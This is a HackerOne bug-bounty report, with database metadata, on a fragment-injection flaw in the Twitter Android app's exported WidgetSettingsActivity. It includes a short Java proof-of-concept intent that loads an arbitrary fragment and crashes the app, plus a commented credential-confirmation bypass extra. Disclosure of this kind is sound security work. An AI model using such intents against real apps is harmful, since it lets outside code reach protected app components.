ID H1:43988 Type hackerone Reporter miantaiduo Modified 2015-04-11T23:57:14
Description
com.twitter.android.WidgetSettingsActivity extend PreferenceActivity and export.
By entering the appropriate extra intent can call any of its internal fragment.
So do not export com.twitter.android.WidgetSettingsActivity
(http://securityintelligence.com/new-vulnerability-android-framework-fragment-injection)
POC:(can make app crash)
private void testtwitter(){
Intent i = new Intent();
i.setFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK);
i.setClassName("com.twitter.android","com.twitter.android.WidgetSettingsActivity");
i.putExtra(":android:show_fragment","com.samsung.android.sdk.pen.objectruntime.preload.VideoIntentFragment");
//i.putExtra("confirmcredentials",false);
startActivity(i);
}
{"id": "H1:43988", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "Twitter: twitter android app Fragment Injection", "description": "com.twitter.android.WidgetSettingsActivity extend PreferenceActivity and export.\r\nBy entering the appropriate extra intent can call any of its internal fragment.\r\nSo do not export com.twitter.android.WidgetSettingsActivity\r\n\uff08http://securityintelligence.com/new-vulnerability-android-framework-fragment-injection\uff09\r\n\r\nPOC\uff1a(can make app crash)\r\nprivate void testtwitter(){\r\n Intent i = new Intent();\r\n i.setFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK);\r\n i.setClassName(\"com.twitter.android\",\"com.twitter.android.WidgetSettingsActivity\");\r\n i.putExtra(\":android:show_fragment\",\"com.samsung.android.sdk.pen.objectruntime.preload.VideoIntentFragment\");\r\n //i.putExtra(\"confirmcredentials\",false);\r\n startActivity(i);\r\n\t}", "published": "2015-01-16T06:26:28", "modified": "2015-04-11T23:57:14", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/43988", "reporter": "miantaiduo", "references": [], "cvelist": [], "lastseen": "2018-04-19T17:34:12", "viewCount": 6, "enchantments": {"score": {"value": 3.0, "vector": "NONE", "modified": "2018-04-19T17:34:12", "rev": 2}, "dependencies": {"references": [], "modified": "2018-04-19T17:34:12", "rev": 2}, "vulnersScore": 3.0}, "bounty": 420.0, "bountyState": "resolved", "h1team": {"profile_picture_urls": {"medium": "https://profile-photos.hackerone-user-content.com/000/000/061/e78ef26a3191adcabe7311daa107bd9e152d3b5c_medium.?1439954730", "small": "https://profile-photos.hackerone-user-content.com/000/000/061/4acfe72859c5e9cb48a152edb4e498e13fa28df2_small.?1439954730"}, "handle": "twitter", "url": "https://hackerone.com/twitter"}, "h1reporter": {"hacker_mediation": false, "disabled": false, "username": "miantaiduo", "is_me?": false, "profile_picture_urls": {"small": "/assets/avatars/default-71a302d706457f3d3a31eb30fa3e73e6cf0b1d677b8fa218eaeaffd67ae97918.png"}, "hackerone_triager": false, "url": "/miantaiduo"}}
